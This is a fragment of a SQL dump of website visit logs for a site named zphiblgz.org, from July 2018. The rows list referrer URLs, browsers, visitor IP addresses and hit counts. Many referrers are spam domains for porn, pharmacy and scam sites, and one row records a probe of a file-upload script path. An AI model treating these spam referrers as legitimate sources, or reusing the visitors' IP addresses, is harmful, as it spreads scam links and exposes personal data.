org','Dispatch','Unknown','0.11.3','','38.94.178.148','000',2,0),(33560,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.130','000',2,0),(33561,'2018-07-22','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','Opera','Windows','7.54','','46.119.124.149','000',3,0),(33562,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.153','000',1,0),(33563,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.130','000',2,0),(33564,'2018-07-22','https://hyip-zanoza.me/','MSIE','Windows','6.0','','178.137.85.122','000',4,0),(33565,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.230','000',2,0),(33566,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.67','000',2,0),(33567,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.227','000',2,0),(33568,'2018-07-22','http://hard-porn.mobi/','Opera','Windows','7.60','','37.115.185.48','000',3,0),(33569,'2018-07-22','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(33570,'2018-07-22','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(33571,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.4','000',2,0),(33572,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.17','000',2,0),(33573,'2018-07-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(33574,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.59','000',2,0),(33575,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.184.54','000',2,0),(33576,'2018-07-22','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(33577,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.159','000',1,0),(33578,'2018-07-22','https://www.google.com/','Edge','Windows','17.17134','','216.218.86.227','000',2,0),(33579,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.152','000',2,0),(33580,'2018-07-22','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33581,'2018-07-22','https://zphiblgz.org/ts_teams/journey-mcmillan/','AppleWebKit','Windows','534','','199.30.25.109','000',1,0),(33582,'2018-07-22','https://zphiblgz.org','MSIE','Windows','11.0','','52.165.166.139','000',1,0),(33583,'2018-07-22','http://porno-chaman.info/','MSIE','Windows','6.0','','46.119.124.149','000',1,0),(33584,'2018-07-22','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.184.105.250','000',2,0),(33585,'2018-07-22','https://zphiblgz.org','MSIE','Windows','10.0','','5.9.94.207','000',1,0),(33586,'2018-07-22','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(33587,'2018-07-22','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.28','000',1,0),(33588,'2018-07-22','http://computer-remont.ru/','MSIE','Windows','5.5','','178.137.85.122','000',1,0),(33589,'2018-07-23','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.98.225','000',2,0),(33590,'2018-07-23','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.181','000',2,0),(33591,'2018-07-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(33592,'2018-07-23','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(33593,'2018-07-23','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',1,0),(33594,'2018-07-23','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(33595,'2018-07-23','https://xn----ctbbcjd3dbsehgi.xn--p1ai/','Opera','Windows','7.54','','37.115.185.48','000',1,0),(33596,'2018-07-23','https://luckybull.io/','Opera','Windows','8.00','','46.118.159.228','000',4,0),(33597,'2018-07-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33598,'2018-07-23','http://rusochineniya.ru/','MSIE','Windows','6.0','','46.185.74.243','000',6,0),(33599,'2018-07-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.37.94.191','000',1,0),(33600,'2018-07-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1857.dN1GKG2cQ88YpCaush65Luejx3cvoj8kJc5X6nNIDDk.6ac13717384b9842d916ba7c0cd0b8c671f5edd0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TUJkN1JaRG5kWWpZa09SS2VoaFJOSHhiVTlhX1VxaEpiN1VVWlQxdDV1dyws&sign=1ec0163061c676daec7259480c9b8b1d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.226.227','000',2,0),(33601,'2018-07-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1857.r1KrhBFun_Ea-4SMUv0L5M55NNzNMH3UwTfSWTkCbwg.e91809a2f8277c9e130008d9e09f255a7bb6f9db&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042T3FHRWNkNzdhakpOV3NuN01HRWR5TERUemZQWldZRk5naGdhekNaWl9xUSws&sign=cd4c89838e7b799f2cd0ee551ff872c7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(33602,'2018-07-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1857.2nS16kYs2yyAdW4zgDtmshVLuNvswrL3m7WaINnrRec.309d6e9ed31905f850be5fffc33edc407563f4a9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NjVQSklwQW01TDlieGhyZ1pWUEd2RDQ5THNLZnhSQjZlbzR2cmlZRGliZyws&sign=39510243e98c8b60f75a16d39dc2cc20&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.139.253','000',2,0),(33603,'2018-07-23','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','77.121.150.205','000',3,0),(33604,'2018-07-23','http://moneyzzz.ru/','Opera','Windows','7.11','','46.119.124.149','000',2,0),(33605,'2018-07-23','http://sladkoevideo.com/','Opera','Windows','9.0','','178.137.85.122','000',2,0),(33606,'2018-07-23','https://zphiblgz.org','Firefox','Windows','40.1','','31.28.61.123','000',2,0),(33607,'2018-07-23','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.149','000',1,0),(33608,'2018-07-23','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(33609,'2018-07-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.112.85','000',2,0),(33610,'2018-07-23','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.158.180','000',1,0),(33611,'2018-07-23','http://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','198.143.158.178','000',1,0),(33612,'2018-07-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(33613,'2018-07-23','zphiblgz.org','Safari','Windows','537.13','','188.213.175.168','000',1,0),(33614,'2018-07-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(33615,'2018-07-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(33616,'2018-07-23','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(33617,'2018-07-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.35','000',1,0),(33618,'2018-07-23','https://zphiblgz.org','python-requests','Unknown','2.19.1','','185.8.49.202','000',1,0),(33619,'2018-07-23','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(33620,'2018-07-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(33621,'2018-07-23','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(33622,'2018-07-23','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(33623,'2018-07-23','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','69.4.81.88','000',1,0),(33624,'2018-07-23','https://zphiblgz.org','Opera','Windows','8.50','','69.4.81.88','000',1,0),(33625,'2018-07-23','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','Opera','Windows','9.0','','46.119.124.149','000',2,0),(33626,'2018-07-23','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(33627,'2018-07-23','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.68','000',1,0),(33628,'2018-07-23','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.68','000',1,0),(33629,'2018-07-23','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(33630,'2018-07-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(33631,'2018-07-23','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','52.37.44.129','000',2,0),(33632,'2018-07-23','https://www.google.com/','Safari','iPhone','11.0','','73.212.154.252','000',2,0),(33633,'2018-07-23','https://zphiblgz.org','Firefox','Windows','52.0','','46.229.170.197','000',1,0),(33634,'2018-07-23','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.213.196.191','000',2,0),(33635,'2018-07-23','http://elementspluss.ru/','Opera','Windows','8.00','','37.115.185.48','000',2,0),(33636,'2018-07-23','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.129.35','000',2,0),(33637,'2018-07-23','https://zphiblgz.org','Firefox','Windows','40.1','','188.162.49.249','000',2,0),(33638,'2018-07-24','https://supermama.top/','Opera','Windows','9.0','','46.119.124.149','000',1,0),(33639,'2018-07-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.237.110.101','000',4,0),(33640,'2018-07-24','http://x5market.ru/','Unknown','Unknown','Unknown','','37.115.185.48','000',1,0),(33641,'2018-07-24','https://top-l2.com/','MSIE','Windows','6.0','','46.118.159.228','000',2,0),(33642,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.214.124.104','000',2,0),(33643,'2018-07-24','https://zphiblgz.org','Firefox','Windows','40.1','','5.200.239.105','000',2,0),(33644,'2018-07-24','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(33645,'2018-07-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1858.StPbZ8gsiTllmjAFXqmv-1DO9lz6SttJREw3OlZlEpk.0d0aff0dfc73485c54427f74f282e83665c889c2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041R0NyMlV1akdiQXFsa2JFenVVUnI2eGtpZ0Y2cVk4ZGdJd3pKMmltWm9Xdyws&sign=21998af815ae5f3c37d12ae56d50004f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.73.40','000',2,0),(33646,'2018-07-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1858.uO7gk-zDhE6OSYTEhhtgt9I5qr1M-R7IYt7IcmW0Dng.c0b055d9d3d0e60902591faede6cfe50b343f8d0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UFEzUGFab3R5VXBjVkJYa0N0NUVQODExN3RqaFVMQ0t2Z1VlVTJ1czdDUSws&sign=886405ccb2e5ea7cd975e0c8de60184a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(33647,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.221.10.179','000',2,0),(33648,'2018-07-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1858.i6vfXz1Pd1-ggBDQKDIJXPseNPFrkBdW2OffdFF8YUI.773542fd696c051085e23f4d043408d4eb770142&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dV9hV2Iwa0NsMHdYa244RDJwaHo1MktLbHZXandPRVowSlEtbllfMDRDQSws&sign=b8127efb83919e79f8e6998d7daa7404&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.211.103.33','000',2,0),(33649,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.221.17.221','000',2,0),(33650,'2018-07-24','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33651,'2018-07-24','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','40.89.131.190','000',3,0),(33652,'2018-07-24','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.155.165','000',2,0),(33653,'2018-07-24','http://ruspoety.ru/','MSIE','Windows','6.0','','5.248.253.117','000',3,0),(33654,'2018-07-24','http://www.zphiblgz.org','Chrome','Macintosh','58.0.3029.110','','104.192.74.19','000',29,0),(33655,'2018-07-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.192.74.19','000',24,0),(33656,'2018-07-24','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(33657,'2018-07-24','https://zphiblgz.org','MSIE','Windows','10.0','','148.251.50.77','000',1,0),(33658,'2018-07-24','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(33659,'2018-07-24','https://www.google.com/','Safari','iPhone','11.0','','107.77.204.140','000',2,0),(33660,'2018-07-24','zphiblgz.org','Safari','Windows','537.13','','173.212.224.12','000',2,0),(33661,'2018-07-24','https://zphiblgz.org','Chrome','Windows','55.0.2903.98','','192.3.180.250','000',1,0),(33662,'2018-07-24','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(33663,'2018-07-24','https://zphiblgz.org','MSIE','Windows','6.0','','85.192.162.173','000',1,0),(33664,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.219.9.133','000',2,0),(33665,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.216.227.122','000',2,0),(33666,'2018-07-24','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',2,0),(33667,'2018-07-24','http://udav.net/','Unknown','Unknown','Unknown','','46.118.159.228','000',1,0),(33668,'2018-07-24','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.208.113.41','000',2,0),(33669,'2018-07-24','android-app://com.google.android.googlequicksearchbox','Chrome','Android','67.0.3396.87','','63.232.44.83','000',7,0),(33670,'2018-07-24','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjM0_DdpbjcAhVBvFMKHQXdDUsQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','159.142.31.92','000',2,0),(33671,'2018-07-24','https://zphiblgz.org','Google-OAuth','Unknown','Unknown','','72.14.199.99','000',1,0),(33672,'2018-07-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(33673,'2018-07-24','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(33674,'2018-07-24','http://www.zphibmaryland.org/chapters/','SamsungBrowser','Android','7.2','','173.73.111.21','000',5,0),(33675,'2018-07-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(33676,'2018-07-24','http://www.zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','216.244.65.11','000',1,0),(33677,'2018-07-24','https://zphiblgz.org','Google-OAuth','Unknown','Unknown','','72.14.199.102','000',1,0),(33678,'2018-07-24','http://rusochineniya.ru/','Opera','Windows','9.0','','5.248.253.117','000',3,0),(33679,'2018-07-24','http://moneyzzz.ru/','MSIE','Unknown','6.0','','46.119.124.149','000',1,0),(33680,'2018-07-24','https://xn----ctbbcjd3dbsehgi.xn--p1ai/','MSIE','Windows','6.0','','37.115.185.48','000',3,0),(33681,'2018-07-24','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.74.69','000',2,0),(33682,'2018-07-24','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','45.55.240.186','000',1,0),(33683,'2018-07-24','https://zphiblgz.org','Google-OAuth','Unknown','Unknown','','72.14.199.104','000',1,0),(33684,'2018-07-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(33685,'2018-07-24','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(33686,'2018-07-24','https://zphiblgz.org','Firefox','Windows','40.1','','197.224.141.119','000',2,0),(33687,'2018-07-24','http://www.zphibmaryland.org/chapters/','Chrome','Windows','67.0.3396.99','','65.246.1.5','000',5,0),(33688,'2018-07-24','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','11.1.2','','108.48.50.104','000',9,0),(33689,'2018-07-24','http://mobile.regionshop.biz/','Opera','Windows','8.01','','46.118.159.228','000',3,0),(33690,'2018-07-24','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',1,0),(33691,'2018-07-24','https://sportwizard.ru/','MSIE','Windows','5.5','','178.137.85.122','000',4,0),(33692,'2018-07-24','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(33693,'2018-07-24','http://ruspoety.ru/','Opera','Windows','8.00','','37.115.185.48','000',1,0),(33694,'2018-07-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.179.158','000',2,0),(33695,'2018-07-25','http://viagra-soft.ru/','MSIE','Windows','5.5','','178.137.85.122','000',3,0),(33696,'2018-07-25','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(33697,'2018-07-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(33698,'2018-07-25','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','Opera','Windows','8.00','','46.119.124.149','000',1,0),(33699,'2018-07-25','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(33700,'2018-07-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(33701,'2018-07-25','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(33702,'2018-07-25','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',2,0),(33703,'2018-07-25','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(33704,'2018-07-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(33705,'2018-07-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(33706,'2018-07-25','https://www.blog100.org/online-traffic-problems-are-now-a-thing-of-the-past/25881788/','Safari','iPhone','11.0','','112.5.248.148','000',2,0),(33707,'2018-07-25','http://zphiblgz.org/','Firefox','Windows','32.1','','192.69.254.112','000',3,0),(33708,'2018-07-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1859.nqWR5BdNvfqns5mp4j3Hihj8SnD-C2xCbWCGZ3NOyZ0.b1c6356b58b7d5d71eccac87e4bc55eda074c918&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Q2lvRTlSM0I3d01zNENCZ3Bja21EcUFTQlF5QnRVTDRSRDdsd3QwVlRaUSws&sign=caaa12b20d11cd9e09df5cdbdabd1ace&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.63.230','000',2,0),(33709,'2018-07-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1859.F37FnKRbEgNuDKxx4PXmIaG3ljsS1HwTvxyxYqH5FU8.df404b2a276bce9acf39bbb8319e4f415f262cef&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UWZ3M242Z2wzVGh4bFJ6WWo2Z0RHV28ydEt2a3VxNUVEbFg5VTVOWFZKZyws&sign=e0c63b6e1cd8d7847a8cc4531957033c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.89.197','000',2,0),(33710,'2018-07-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1859.vpKsYStKZaloExECN7VaAHQIg1_v-Mk_TRzPzo_pAoA.9de8e3089d61fa3a82c56702e5276b445800a4ea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043QUlZbnZ5bW83Y2NxOVd0X1M3QnczdENaRGNDVlJKcHFXU1FweXRnRmxpUSws&sign=9425f1713fec083bb587e2eb183f33dc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','146.185.183.235','000',2,0),(33711,'2018-07-25','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(33712,'2018-07-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(33713,'2018-07-25','http://technika-remont.ru/','MSIE','Windows','6.0','','178.137.85.122','000',3,0),(33714,'2018-07-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','78.24.216.109','000',2,0),(33715,'2018-07-25','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','18.237.87.30','000',2,0),(33716,'2018-07-25','https://zphiblgz.org','Firefox','Windows','40.1','','81.214.135.205','000',2,0),(33717,'2018-07-25','https://zphiblgz.org','Firefox','Windows','40.1','','117.193.49.129','000',2,0),(33718,'2018-07-25','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.101','000',2,0),(33719,'2018-07-25','https://balkanfarma.org/','Opera','Windows','7.11','','46.119.124.149','000',1,0),(33720,'2018-07-25','https://zphiblgz.org','ZoomBot','Unknown','Unknown','','18.194.234.105','000',2,0),(33721,'2018-07-25','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(33722,'2018-07-25','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.22','000',2,0),(33723,'2018-07-25','https://zphiblgz.org','Safari','Macintosh','11.1.1','','71.179.15.195','000',6,0),(33724,'2018-07-25','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(33725,'2018-07-25','https://zphiblgz.org','Opera','Windows','11.00','','159.89.113.89','000',2,0),(33726,'2018-07-25','https://zphiblgz.org','Chrome','Windows','27.0.1500.55','','159.89.113.89','000',2,0),(33727,'2018-07-25','https://zphiblgz.org','Chrome','Windows','28.0.1468.0','','159.89.113.89','000',2,0),(33728,'2018-07-25','https://zphiblgz.org','Firefox','Windows','22.0','','159.89.113.89','000',1,0),(33729,'2018-07-25','https://zphiblgz.org','Firefox','Windows','40.1','','93.169.139.84','000',2,0),(33730,'2018-07-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(33731,'2018-07-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(33732,'2018-07-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33733,'2018-07-25','https://zphiblgz.org','Firefox','Windows','40.1','','97.94.17.75','000',2,0),(33734,'2018-07-25','http://porno-chaman.info/','Opera','Windows','7.60','','46.119.124.149','000',2,0),(33735,'2018-07-25','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.16','000',1,0),(33736,'2018-07-25','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.182.200','000',2,0),(33737,'2018-07-25','http://metallosajding.ru/','Opera','Windows','9.00','','46.118.159.228','000',3,0),(33738,'2018-07-25','https://zphiblgz.org','MSIE','Windows','9.0','','34.212.76.166','000',3,0),(33739,'2018-07-25','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(33740,'2018-07-25','https://zphiblgz.org','Firefox','Windows','49.0','','115.84.92.243','000',2,0),(33741,'2018-07-25','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.28','000',1,0),(33742,'2018-07-25','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(33743,'2018-07-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.125','000',2,0),(33744,'2018-07-25','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','99.203.17.73','000',8,0),(33745,'2018-07-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(33746,'2018-07-25','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.4','000',1,0),(33747,'2018-07-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(33748,'2018-07-25','https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Firefox','Windows','52.0','','178.32.120.124','000',5,0),(33749,'2018-07-25','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(33750,'2018-07-25','https://zphiblgz.org','Chrome','Windows','53.0.2820.53','','189.240.112.130','000',1,0),(33751,'2018-07-25','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',2,0),(33752,'2018-07-25','http://zphiblgz.org/','MSIE','Windows','11.0','','82.102.20.175','000',1,0),(33753,'2018-07-25','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(33754,'2018-07-25','https://www.souvenirua.com/uk/','MSIE','Unknown','6.0','','178.137.85.122','000',3,0),(33755,'2018-07-25','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(33756,'2018-07-25','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.56','000',1,0),(33757,'2018-07-25','https://zphiblgz.org','python-requests','Unknown','2.19.1','','185.8.49.202','000',1,0),(33758,'2018-07-25','https://www.google.com/','Safari','iPhone','11.0','','107.77.215.166','000',2,0),(33759,'2018-07-25','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33760,'2018-07-25','https://zphiblgz.org','Firefox','Windows','3.0','','74.201.38.160','000',1,0),(33761,'2018-07-25','http://www.zphibmaryland.org/chapters/','Edge','Windows','17.17134','','76.106.127.143','000',3,0),(33762,'2018-07-25','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(33763,'2018-07-25','http://www.rospromtest.ru/','MSIE','Windows','6.0','','5.248.253.117','000',3,0),(33764,'2018-07-25','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.129.35','000',2,0),(33765,'2018-07-25','https://ask-yug.com/','Opera','Windows','7.60','','46.118.159.228','000',1,0),(33766,'2018-07-25','http://zphiblgz.org/','Firefox','Windows','44.1','','79.176.29.224','000',1,0),(33767,'2018-07-26','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(33768,'2018-07-26','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(33769,'2018-07-26','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(33770,'2018-07-26','https://zphiblgz.org','Firefox',